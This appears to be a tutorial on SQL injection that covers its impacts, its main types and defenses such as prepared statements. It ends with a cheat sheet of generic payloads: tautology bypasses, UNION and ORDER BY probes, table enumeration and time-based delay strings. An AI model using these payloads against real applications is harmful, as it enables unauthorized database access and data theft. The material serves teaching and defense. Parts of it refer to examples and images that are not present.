SQL injection (SQLi)

is a cyberattack that injects malicious SQL code into an application, allowing the attacker to view or
modify a database.

Consequences of a Successful SQL Injection Attack

SQL injection attacks can have a significant negative impact on an organization. Organizations have
access to sensitive company data and private customer information, and SQL injection attacks often
target that confidential information. When a malicious user successfully completes an SQL injection
attack, it can have any of the following impacts:

Exposes Sensitive Company Data: Using SQL injection, attackers can retrieve and alter data, which risks
exposing sensitive company data stored on the SQL server.

Compromise Users’ Privacy: Depending on the data stored on the SQL server, an attack can expose
private user data, such as credit card numbers.

Give an attacker administrative access to your system: If a database user has administrative privileges,
an attacker can gain access to the system using malicious code. To protect against this kind of
vulnerability, create a database user with the least possible privileges.

Give an Attacker General Access to Your System: If you use weak SQL commands to check user names
and passwords, an attacker could gain access to your system without knowing a user’s credentials. With
general access to your system, an attacker can cause additional damage accessing and manipulating
sensitive information.

Compromise the Integrity of Your Data: Using SQL injection, attackers can make changes to or delete
information from your system.

3 Types of SQL Injection

1. In-band SQL Injection
In-band SQL injection is the most common type of attack. With this type of SQL injection attack, a
malicious user uses the same communication channel for the attack and to gather results. The following
techniques are the most common types of in-band SQL injection attacks:

Error-based SQL injection: With this technique, attackers gain information about the database
structure when they use a SQL command to generate an error message from the database server. Error
messages are useful when developing a web application or web page, but they can be a vulnerability
later because they expose information about the database. To prevent this vulnerability, you can disable
error messages after a website or application is live.

2. Inferential SQL Injection

Inferential SQL injection is also called blind SQL injection because the website database doesn’t transfer
data to the attacker like with in-band SQL injection. Instead, a malicious user can learn about the
structure of the server by sending data payloads and observing the response. Inferential SQL injection
attacks are less common than in-band SQL injection attacks because they can take longer to complete.
The two types of inferential SQL injection attacks use the following techniques:

Boolean injection: With this technique, attackers send a SQL query to the database and observe the
result. Attackers can infer if a result is true or false based on whether the information in the HTTP
response was modified.

Time-based injection: With this technique, attackers send a SQL query to the database, making the
database wait a specific number of seconds before responding. Attackers can determine if the result is
true or false based on the number of seconds that elapses before a response. For example, a hacker
could use a SQL query that commands a delay if the first letter of the first database’s name is A. Then, if
the response is delayed, the attacker knows the query is true.

3. Out-of-Band SQL Injection

Out-of-band SQL injection is the least common type of attack. With this type of SQL injection attack,
malicious users use a different communication channel for the attack than they use to gather results.
Attackers use this method if a server is too slow or unstable to use inferential SQL injection or in-band
SQL injection.

How to Prevent SQL Injection

1. Use Stored Procedure, Not Dynamic SQL
Consider our earlier dynamic SQL example. In the images below, you can see what it
looks like after a user executes SQL injection in the login form. Notice that the fourth
statement will be ignored since the “–” syntax disables any succeeding commands, while
the third always returns “true.” This results in a successful login, even if the username
and password are incorrect (see Images 1.1 and 1.2).
2. Use Prepared Statements
Prepared Statements (PS) are pre-compiled SQL commands created inside a program that can
be used many times over the course of the application’s lifecycle. By default, PS input
parameters are binded. Binded parameters are treated as plain text values, which prevents any
command alteration during an SQL injection attack. Consider the example in Image 2.1: A PS
variation of the dynamic SQL query introduced earlier maintains the intended login behavior
despite the SQL injection parameters in Image 2.2. Image 2.3 shows the resulting SQL command
after the input parameters and PS were binded. This will not cause any unexpected SQL results
or program outcomes.

3.Input Validation
Validating input plays a significant role in preventing SQL injection. Suspicious inputs are filtered
prior to submission or processing by the server when validated. An example of input validation
is an email validator. There are two types of validation: server side and client side.

Generic SQL Injection Payloads

'

''

``

"
""

//

\\

' or "

-- or #

' OR '1

' OR 1 -- -

" OR "" = "

" OR 1 = 1 -- -

' OR '' = '

'='

'LIKE'

'=0--+

OR 1=1

' OR 'x'='x

' AND id IS NULL; --

'''''''''''''UNION SELECT '2

%00

/*…*/

+ addition, concatenate (or space in url)

|| (double pipe) concatenate

% wildcard attribute indicator

@variable local variable

@@variable global variable

# Numeric

AND 1

AND 0

AND true

AND false

1-false

1-true

1*56

-2

1' ORDER BY 1--+

1' ORDER BY 2--+

1' ORDER BY 3--+

1' ORDER BY 1,2--+

1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+

1' GROUP BY 1,2,3--+

' GROUP BY columnnames having 1=1 --

-1' UNION SELECT 1,2,3--+

' UNION SELECT sum(columnname ) from tablename --

-1 UNION SELECT 1 INTO @,@

-1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

Finding the table name

Time-Based:

,(select * from (select(sleep(10)))a)

%2c(select%20*%20from%20(select(sleep(10)))a)

';WAITFOR DELAY '0:0:30'--

Comments:

# Hash comment

/* C-style comment

-- - SQL comment

;%00 Nullbyte

` Backtick